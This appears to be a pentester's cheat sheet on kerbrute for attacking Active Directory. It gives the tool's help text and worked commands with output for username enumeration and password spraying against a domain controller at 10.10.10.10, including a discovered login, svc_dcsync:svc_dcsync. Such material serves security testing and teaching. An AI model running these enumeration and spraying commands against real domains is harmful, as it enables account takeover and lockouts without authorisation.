This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
A list of common used AD usernames can be downloaded here.
Download latest binary from Github.com
kerbrute [command]
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 02/15/21 - Ronnie Flathers @ropnop
This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts
Available Commands:
bruteforce Bruteforce username:password combos, from a file or stdin
bruteuser Bruteforce a single user's password from a wordlist
help Help about any command
passwordspray Test a single password against a list of users
userenum Enumerate valid domain usernames via Kerberos
version Display version info and quit
Flags:
--dc string The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
--delay int Delay in millisecond between each attempt. Will always use single thread if set
-d, --domain string The full domain to use (e.g. contoso.com)
-h, --help help for kerbrute
-o, --output string File to write logs to. Optional.
--safe Safe mode. Will abort if any user comes back as locked out. Default: FALSE
-t, --threads int Threads to use (default 10)
-v, --verbose Log failures and errors
Use "kerbrute [command] --help" for more information about a command.
After you succesfully enumerated usernames you can try ASREPRoasting with Impacket GetNPUsers.py or use CrackMapExec to do a password spray.
$ ./kerbrute userenum --dc 10.10.10.10 -d offsec.nl usersnames.txt -o userenum-output.txt
Version: v1.0.3 (9dad6e1) - 02/15/21 - Ronnie Flathers @ropnop
2021/02/15 13:22:24 > Using KDC(s):
2021/02/15 13:22:24 > 10.10.10.10:88
2021/02/15 13:22:24 > [+] VALID USERNAME: john@offsec.nl
2021/02/15 13:22:24 > [+] VALID USERNAME: jane@offsec.nl
2021/02/15 13:22:24 > [+] VALID USERNAME: johndo-adm@offsec.nl
2021/02/15 13:22:24 > [+] VALID USERNAME: janedo-adm@offsec.nl
2021/02/15 13:22:24 > Done! Tested 21 usernames (4 valid) in 0.017 seconds
To extract the valid usernames to a separate file you can use the following command.
cat userenum-output.txt | awk '{print $7}' | cut -d '@' -f1 > available-users.txt
It can be helpfull to use LDAPDomainDump to gather all user accountnames, filter them and use as input for the spray.
$ ./kerbrute passwordspray --dc 10.10.10.10 -d offsec.nl users.txt Welkom01!
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 02/15/21 - Ronnie Flathers @ropnop
It can be helpfull to use LDAPDomainDump to gather all user accountnames and use them as input for the ‘user-as-pass’ spray.
$ ./kerbrute passwordspray --dc 10.10.10.10 -d offsec.nl users.txt --user-as-pass
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 01/17/22 - Ronnie Flathers @ropnop
2022/01/17 15:35:28 > Using KDC(s):
2022/01/17 15:35:28 > 10.10.10.10:88
2022/01/17 15:35:31 > [+] VALID LOGIN: svc_dcsync@offsec.nl:svc_dcsync
2022/01/17 15:35:38 > Done! Tested 4393 logins (1 successes) in 9.460 seconds